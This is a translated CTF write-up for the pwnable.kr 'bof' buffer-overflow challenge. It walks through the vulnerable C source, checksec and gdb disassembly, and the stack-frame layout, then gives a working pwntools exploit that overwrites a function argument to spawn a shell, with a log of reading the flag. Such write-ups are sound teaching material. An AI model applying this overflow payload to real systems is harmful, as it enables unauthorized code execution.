[pwnable.kr] bof
Author: 해킹잘하고싶다

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=8591

ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ checksec --file=bof
RELRO           STACK CANARY   NX          PIE          RPATH     RUNPATH     Symbols     FORTIFY  Fortified  Fortifiable  FILE
Partial RELRO   Canary found   NX enabled  PIE enabled  No RPATH  No RUNPATH  70 Symbols  No       0          1            bof


Checking with checksec shows "Canary found".
I roughly assumed a canary was in place and had a careful look at the source.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
        char overflowme[32];
        printf("overflow me : ");
        gets(overflowme);        // smash me! (unbounded read into a 32-byte buffer)
        if(key == 0xcafebabe){   // key is the caller's argument, above the return address
                system("/bin/sh");
        }
        else{
                printf("Nah..\n");
        }
}

int main(int argc, char* argv[]){
        func(0xdeadbeef);        // the argument the overflow has to turn into 0xcafebabe
        return 0;
}

What tripped me up here was that I could not clearly recall whether the parameter int key
sits before or after the return address.
(Every time I forget something like this, repeating it and relearning it seems to be how it actually sticks.)

The layout depends on the calling convention, and this binary is 32-bit: the disassembly below uses ebp/esp,
and main passes the argument with "mov DWORD PTR [esp],0xdeadbeef" before "call func". Under cdecl the caller
stores the argument on the stack, "call" pushes the return address on top of it, and func then pushes ebp, so key
ends up above the return address and SFP, not between SFP and the locals. From high to low addresses, func's frame is:

key          [ebp+0x8]    cmp DWORD PTR [ebp+0x8],0xcafebabe
RET          [ebp+0x4]
SFP          [ebp]
(8 bytes of padding)
canary       [ebp-0xc]    mov DWORD PTR [ebp-0xc],eax
overflowme   [ebp-0x2c]   lea eax,[ebp-0x2c]  (32 bytes, ending right at the canary)

Writing from the start of overflowme, key is 0x2c + 0x8 = 0x34 bytes away, and the canary, SFP and RET are all
overwritten on the way there. A 64-bit test program does not reproduce this: on x86-64 the first integer argument
arrives in edi, and the compiler only stores it into a local slot because its address is taken, which is why &key
shows up just below overflowme in such a test rather than above the return address.

To check this I compiled and ran a simple C program.


===============================================
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ cat test.c
#include <stdio.h>

void func(int key)
{
        char overflowme[32];

        /* Taking &key forces the compiler to spill the register-passed
           argument into func's own frame on x86-64, so this address says
           nothing about where a caller-pushed (32-bit cdecl) argument lives. */
        printf("Address of overflowme: %p\n", (void*)overflowme);
        printf("Address of key: %p\n", (void*)&key);
}

int main(void)
{
        func(0xdeadbeef);
        return 0;
}
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ ./test
Address of overflowme: 0x7ffe2575c7c0
Address of key: 0x7ffe2575c7bc
ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$
===================================================


ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ gdb -q bof
Reading symbols from bof...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x0000068a <+0>:        push   ebp
   0x0000068b <+1>:        mov    ebp,esp
   0x0000068d <+3>:        and    esp,0xfffffff0
   0x00000690 <+6>:        sub    esp,0x10
   0x00000693 <+9>:        mov    DWORD PTR [esp],0xdeadbeef
   0x0000069a <+16>:        call   0x62c <func>
   0x0000069f <+21>:        mov    eax,0x0
   0x000006a4 <+26>:        leave  
   0x000006a5 <+27>:        ret    
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
   0x0000062c <+0>:        push   ebp
   0x0000062d <+1>:        mov    ebp,esp
   0x0000062f <+3>:        sub    esp,0x48
   0x00000632 <+6>:        mov    eax,gs:0x14
   0x00000638 <+12>:        mov    DWORD PTR [ebp-0xc],eax
   0x0000063b <+15>:        xor    eax,eax
   0x0000063d <+17>:        mov    DWORD PTR [esp],0x78c
   0x00000644 <+24>:        call   0x645 <func+25>
   0x00000649 <+29>:        lea    eax,[ebp-0x2c]
   0x0000064c <+32>:        mov    DWORD PTR [esp],eax
   0x0000064f <+35>:        call   0x650 <func+36>
   0x00000654 <+40>:        cmp    DWORD PTR [ebp+0x8],0xcafebabe
   0x0000065b <+47>:        jne    0x66b <func+63>
   0x0000065d <+49>:        mov    DWORD PTR [esp],0x79b
   0x00000664 <+56>:        call   0x665 <func+57>
   0x00000669 <+61>:        jmp    0x677 <func+75>
   0x0000066b <+63>:        mov    DWORD PTR [esp],0x7a3
   0x00000672 <+70>:        call   0x673 <func+71>
   0x00000677 <+75>:        mov    eax,DWORD PTR [ebp-0xc]
   0x0000067a <+78>:        xor    eax,DWORD PTR gs:0x14
   0x00000681 <+85>:        je     0x688 <func+92>
   0x00000683 <+87>:        call   0x684 <func+88>
   0x00000688 <+92>:        leave  
   0x00000689 <+93>:        ret    
End of assembler dump.
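To make the layout concrete, here is a small model of func's frame built from the offsets in the disassembly above. It is an added example for this writeup, not code from the original post or from pwnable.kr; the saved-ebp, return-address and canary values are constructed placeholders, and the names FRAME_SLOTS, simulate_gets, run_func and build_payload are hypothetical. It replays what gets() does to the frame for a given input line, reports which slots were smashed, and shows the order in which func's own checks then see them.

```python
"""Model of func()'s 32-bit stack frame in pwnable.kr bof, driven by the
offsets in the gdb disassembly.  Added example; not code from the writeup
or from pwnable.kr.  Saved ebp, return address and canary are placeholders."""
import struct

# (offset from saved ebp, size in bytes) of each slot the overflow can reach.
FRAME_SLOTS = {
    "overflowme": (-0x2c, 32),  # lea eax,[ebp-0x2c]          -> char overflowme[32]
    "canary":     (-0x0c, 4),   # mov DWORD PTR [ebp-0xc],eax -> copy of gs:0x14
    "saved_ebp":  (0x00, 4),    # push ebp / mov ebp,esp
    "ret_addr":   (0x04, 4),    # pushed by 'call func' in main
    "key":        (0x08, 4),    # cmp DWORD PTR [ebp+0x8],0xcafebabe -> cdecl argument
}
FRAME_LO = FRAME_SLOTS["overflowme"][0]                    # -0x2c, lowest address
FRAME_HI = FRAME_SLOTS["key"][0] + FRAME_SLOTS["key"][1]   # +0x0c, one past key

# Constructed initial contents (placeholders, not addresses from a real run).
INITIAL_VALUES = {
    "canary":    0x5e6c7d00,  # glibc keeps the canary's lowest byte 0x00
    "saved_ebp": 0xffffd0a8,
    "ret_addr":  0x5655569f,  # main+21 under a made-up PIE base
    "key":       0xdeadbeef,  # what main actually passes
}


def _index(name):
    """Byte range of a slot inside the bytearray returned by fresh_frame()."""
    off, size = FRAME_SLOTS[name]
    return off - FRAME_LO, off - FRAME_LO + size


def fresh_frame():
    """Frame bytes covering offsets FRAME_LO..FRAME_HI-1, overflowme zeroed."""
    frame = bytearray(FRAME_HI - FRAME_LO)
    for name, value in INITIAL_VALUES.items():
        lo, hi = _index(name)
        frame[lo:hi] = struct.pack("<I", value)
    return frame


def read_slot(frame, name):
    """Little-endian dword stored in a 4-byte slot."""
    lo, hi = _index(name)
    return struct.unpack("<I", bytes(frame[lo:hi]))[0]


def simulate_gets(line):
    """gets(overflowme): copy everything before the newline into the buffer
    with no bound, then append the terminating NUL.  Bytes past the end of
    the modelled frame are dropped (they would land in main's frame)."""
    frame = fresh_frame()
    data = line.split(b"\n", 1)[0] + b"\x00"
    start, _ = _index("overflowme")
    chunk = data[: len(frame) - start]
    frame[start: start + len(chunk)] = chunk
    state = {name: read_slot(frame, name) for name in INITIAL_VALUES}
    state["clobbered"] = [n for n in INITIAL_VALUES if state[n] != INITIAL_VALUES[n]]
    return state


def run_func(line):
    """Events in func() after gets(), in the order the disassembly executes
    them: the key comparison (and system("/bin/sh")) comes first, the canary
    check in the epilogue last, so a smashed canary only matters once the
    shell has exited."""
    state = simulate_gets(line)
    events = ["/bin/sh" if state["key"] == 0xcafebabe else "Nah.."]
    if state["canary"] != INITIAL_VALUES["canary"]:
        events.append("*** stack smashing detected ***")
    return events


def build_payload(value=0xcafebabe):
    """Filler from the start of overflowme up to key, then the new key value."""
    pad = FRAME_SLOTS["key"][0] - FRAME_SLOTS["overflowme"][0]  # 0x2c + 0x8 = 0x34
    return b"A" * pad + struct.pack("<I", value)


if __name__ == "__main__":
    for line in (b"hello\n", b"A" * 32 + b"\n", b"A" * 33 + b"\n", build_payload() + b"\n"):
        state = simulate_gets(line)
        print(f"{len(line) - 1:3d} bytes -> key=0x{state['key']:08x} "
              f"clobbered={state['clobbered']} events={run_func(line)}")
```

Two details the model makes visible: exactly 32 input bytes leave the canary intact because the NUL that gets() appends lands on the canary's low byte, which glibc already keeps at 0x00, while 33 bytes trip the check; and 0x34 bytes of filler alone only zero the low byte of key, so the full 0x38-byte payload is needed to land 0xcafebabe.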


Below is exploit code that works against bof. The padding length comes straight from the disassembly: overflowme
lives at [ebp-0x2c] and key, the argument main stored for the call, at [ebp+0x8], so 0x2c + 0x8 = 0x34 bytes of
filler followed by 0xcafebabe overwrite it. The canary at [ebp-0xc], the saved ebp and the return address are
clobbered as well, but func compares key and calls system("/bin/sh") first; the canary is only checked at
func+75..func+87 on the way out, after the shell has exited, so the stack-protector failure only fires once the
flag has already been read.



from pwn import *

context.log_level = 'debug'

p = remote('pwnable.kr', 9000)
#p = process('./bof')

# overflowme starts at ebp-0x2c and key (func's cdecl argument) at ebp+0x8,
# so 0x2c + 0x8 = 0x34 bytes of filler reach it.  The canary (ebp-0xc),
# saved ebp and return address are overwritten on the way, but func checks
# key and runs system("/bin/sh") before the canary check in its epilogue.
payload = b'A' * 0x34
payload += p32(0xcafebabe)   # little-endian 0xcafebabe

p.sendline(payload)          # gets() reads up to the newline

p.interactive()






ka0r1@ka0r1-To-Be-Filled-By-O-E-M:~$ python3 exploit.py
[+] Opening connection to pwnable.kr on port 9000: Done
[DEBUG] Sent 0x39 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000030  41 41 41 41  be ba fe ca  0a                        │AAAA│····│·│
    00000039
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x1c bytes:
    b'bof\n'
    b'bof.c\n'
    b'flag\n'
    b'log\n'
    b'super.pl\n'
bof
bof.c
flag
log
super.pl
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x20 bytes:
    b'daddy, I just pwned a buFFer :)\n'
daddy, I just pwned a buFFer :)
$

The flag is:

daddy, I just pwned a buFFer :)

Hit : 193     Date : 2024/12/25 09:44